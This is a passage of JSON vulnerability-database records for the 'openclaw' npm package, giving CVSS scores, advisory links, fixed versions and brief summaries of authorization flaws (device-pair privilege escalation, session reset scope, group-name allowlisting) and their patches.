/openclaw/commit/4ee4960de2330b5322127f925f3687dc6f105be1"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-hc5h
-pmr3-3497","reference_id":"","reference_type":"","scores":[{"value":"9.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:39Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-hc5h-pmr3-3497"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33579","reference_id":"","reference_type":"","scores":[{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33579"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-missing-caller-scope-validation-in-device-pair-approval","reference_id":"","reference_type":"","scores":[{"value":"9.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"},{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:39Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-missing-caller-scope-validation-in-device-pair-approval"},{"reference_url":"https://github.com/advisories/GHSA-hc5h-pmr3-3497","reference_id":"GHSA-hc5h-pmr3-3497","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elem
ents":""}],"url":"https://github.com/advisories/GHSA-hc5h-pmr3-3497"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109863?format=json","purl":"pkg:npm/openclaw@2026.3.28","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g
6hw-abbw"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-g
auf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-p
nbe-wqej"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"}],"aliases":["CVE-2026-33579","GHSA-hc5h-pmr3-3497"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-k52b-966p-ybbk"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90034?format=json","vulnerability_id":"VCID-k5da-7tht-w3bs","summary":"OpenClaw Gateway `operator.write` can reach admin-only session reset via `chat.send` `/reset`\n## Summary\n\nThe `chat.send` path reused command authorization to trigger `/reset` session rotation even though direct session reset is an admin-only control-plane operation.\n\n## Impact\n\nA write-scoped gateway caller could rotate a target session, archive the prior transcript state, and force a new session id without admin scope.\n\n## Affected Component\n\n`src/gateway/server-methods/chat.ts, src/auto-reply/reply/session.ts`\n\n## Fixed Versions\n\n- Affected: `<= 2026.3.24`\n- Patched: `>= 2026.3.28`\n- Latest stable `2026.3.28` contains the fix.\n\n## Fix\n\nFixed by commit `be00fcfccb` (`Gateway: align chat.send reset scope 
checks`).","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/be00fcfccba108f88dc3d4380146c6e058770b03","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/be00fcfccba108f88dc3d4380146c6e058770b03"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.28","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.28"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-5r8f-96gm-5j6g","reference_id":"","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-5r8f-96gm-5j6g"},{"reference_url":"https://github.com/advisories/GHSA-5r8f-96gm-5j6g","reference_id":"GHSA-5r8f-96gm-5j6g","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-5r8f-96gm-5j6g"}],"fixed
_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109863?format=json","purl":"pkg:npm/openclaw@2026.3.28","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-b9w
3-w2nq-cqg6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9j
f-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zg6
8-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"}],"aliases":["GHSA-5r8f-96gm-5j6g"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-k5da-7tht-w3bs"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91430?format=json","vulnerability_id":"VCID-k7fe-dqzc-kbcm","summary":"OpenClaw's Zalouser allowlist authorization matched mutable group names by default\n### Summary\n\nOpenClaw's Zalouser allowlist mode accepted mutable group names and normalized slugs as authorization matches instead of requiring stable group IDs. In deployments that used name-based `channels.zalouser.groups` entries together with permissive sender allowlists, a different group could be accepted by reusing the same display name as an allowlisted group.\n\n### Impact\n\nThis weakened channel authorization for Zalouser group routing and could allow messages from an unintended group to reach the agent when operators relied on group names instead of stable IDs.\n\n### Affected versions\n\n`openclaw` `<= 2026.3.11`\n\n### Patch\n\nFixed in `openclaw` `2026.3.12`. 
Allowlist authorization now matches stable group identifiers, and users should update to `2026.3.12` or later.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.12","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.12"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-f5mf-3r52-r83w","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-f5mf-3r52-r83w"},{"reference_url":"https://github.com/advisories/GHSA-f5mf-3r52-r83w","reference_id":"GHSA-f5mf-3r52-r83w","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-f5mf-3r52-r83w"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/112780?format=json","purl":"pkg:npm/openclaw@2026.3.12","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerabilit
y":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerabilit
y":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID